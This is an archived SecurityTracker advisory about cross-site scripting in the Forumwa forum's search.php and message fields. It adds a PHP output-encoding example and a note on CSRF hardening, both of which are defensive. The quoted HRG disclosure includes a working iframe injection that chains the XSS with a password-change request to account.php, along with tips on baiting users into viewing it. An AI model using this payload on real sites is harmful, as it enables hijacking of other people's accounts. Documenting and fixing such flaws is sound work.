SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   Forumwa
Vendors:   demof.com
Forumwa Input Validation Errors in 'search.php' Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1013350
SecurityTracker URL:  http://securitytracker.com/id/1013350
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 2 2005
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): v1
Description:   An input validation vulnerability was reported in Forumwa. A remote user can conduct cross-site scripting attacks.

The 'search.php' script does not properly validate user-supplied input in the search string. A remote user can supply specially crafted input that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Forumwa software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The body and subject of messages are also affected.

The vendor has been notified.

Raven from Hackerlounge Research Group reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Forumwa software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.demof.com/forumwa.php
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
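The cause named above is missing output encoding at the points where the search keyword, and a message's subject and body, are written back into HTML. The snippet below is an added illustration for this page, not Forumwa's code and not the vendor's patch: the function names, the constructed sample input and the assumption that search.php reflects the keyword into both the page title and the body are all assumptions about how the script renders.

```php
<?php
// Added example, not Forumwa's code. Shows the raw-echo pattern the
// advisory describes beside a hardened version that HTML-encodes every
// reflection of untrusted input. Function names are assumptions.

declare(strict_types=1);

// Encode an untrusted string for an HTML text or quoted-attribute context.
// ENT_QUOTES covers both ' and ", ENT_SUBSTITUTE avoids returning an empty
// string on malformed UTF-8 (which would silently drop content).
function h(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// BEFORE (assumed shape of the flaw): the keyword is echoed raw into the
// <title> and the results paragraph, so a value beginning with </title>
// closes the title and injects markup.
function renderSearchVulnerable(string $keyword): string
{
    return "<title>Search: $keyword</title>\n<p>Results for $keyword</p>";
}

// AFTER: the keyword is encoded once and only the encoded copy is used.
function renderSearchHardened(string $keyword): string
{
    $k = h($keyword);
    return "<title>Search: $k</title>\n<p>Results for $k</p>";
}

// Stored case: subject and body are encoded at render time, so a posted
// <iframe ...> is displayed as text rather than loaded by the browser.
function renderMessageHardened(string $subject, string $body): string
{
    return '<h2>' . h($subject) . "</h2>\n"
         . '<div class="body">' . nl2br(h($body)) . '</div>';
}

// Constructed sample input: the title-breakout shape from the advisory.
$keyword = '</title><iframe src="x"></iframe><title>';

echo "--- vulnerable ---\n", renderSearchVulnerable($keyword), "\n\n";
echo "--- hardened ---\n", renderSearchHardened($keyword), "\n\n";
echo "--- stored message, hardened ---\n",
     renderMessageHardened('<script>alert(1)</script>', "line one\n<iframe src=x></iframe>"), "\n";

// Sanity check: no raw tag from the input survives into the hardened output.
assert(strpos(renderSearchHardened($keyword), '<iframe') === false);
assert(strpos(renderMessageHardened('<b>', '<i>'), '<b>') === false);
```

Run it from the command line with `php` to see the encoded output next to the raw one. The second stage of the proof of concept below (a framed request to account.php that changes the password) is a separate cross-site request forgery exposure; output encoding stops the injection, while requiring a POST with a per-session token and the current password would block that state change even from an unrelated page.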

Message History:   None.


 Source Message Contents

Subject:  Forumwa search.php xss vulnerability

 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][] 
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own responsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
  
 Vulnerable: Forumwa_v1 (any version)  
  
 
 ---  
  
 General information:  
  
 Forumwa is a simple discussion forum, based on PHP 
and MySQL. Besides the basic features there are 
special functions like search function, user 
profiles, memberlist, mailer, feedback? 
Multilanguage, easy installation.  
  
  
 ---  
  
 Description:  
  
 The search.php script is vulnerable to an XSS attack 
by a remote attacker. The searched string is not 
filtered for any harmful characters like < > and ". 
This makes it possible for an attacker to trick a 
user into going to a harmful page and stealing a 
session.  
  
 Also, the body and the subject of a message posted 
on the forum are not checked for < or > characters. 
The combination of these two vulnerabilities makes a 
real big problem.  
  
  
 ---  
  
 Proof Of Concept:  
  
 What this proof of concept will do is load a 1x1px 
IFrame from a message in the board that will abuse 
the search.php xss attack to change a viewer's 
password to "wh00ters". How to use: make a post 
containing the following body and hope someone 
actually views the messages on the board. Once they 
open the link to view the post, their account is 
yours. Tip: make it a nice thread that people will 
reply to so you know who you compromised.  
  
 ---PoC Injection---  
  
 <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM 
DIRECTORY 
CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST 
URL CHANGEME!!!]/[FORUM DIRECTORY 
CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=u@mail.com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E
 
HEIGHT=1 WIDTH=1></iframe>  
  
 ---PoC Injection---  
  
 All that needs to be altered in this injection are 
the things between [ ] that say "CHANGEME!!!"  
  
  
 ---  
  
 Fix and Vendor status:  
  
Vendor has been notified; expect an official patch 
soon. 
  
 ---  
 
Greetz: 
 
All the people at hackerlounge.com, JWT, 
TGS-Security.com and JWT-Security.net. 
Specifically: 
 
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, 
Modzilla, Pingu, Jake Johnson, Afterburn, airo, 
cardiaC, chis, ComputerGeek, deep_phreeze, dudley, 
evasion, eXtacy, Mattewan, Afterburn, 
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, 
Slarty, NoUse, Snake (I hate you), Surreal (I hate 
you), -=Vanguard=-, The_IRS, puNKiey, driedice, 
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, 
voteforpedro, Cryptic_Override, kodaxx, 
~CreEpy~NoDquE~, Brainscan, the_exode, 
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and 
anyone else I forgot.  
 
 
--- 
 
Credit: 
 
HRG - Hackerlounge Research Group 
http://www.Hackerlounge.com 
 
  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own responsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][] 

 
 



Copyright 2021, SecurityGlobal.net LLC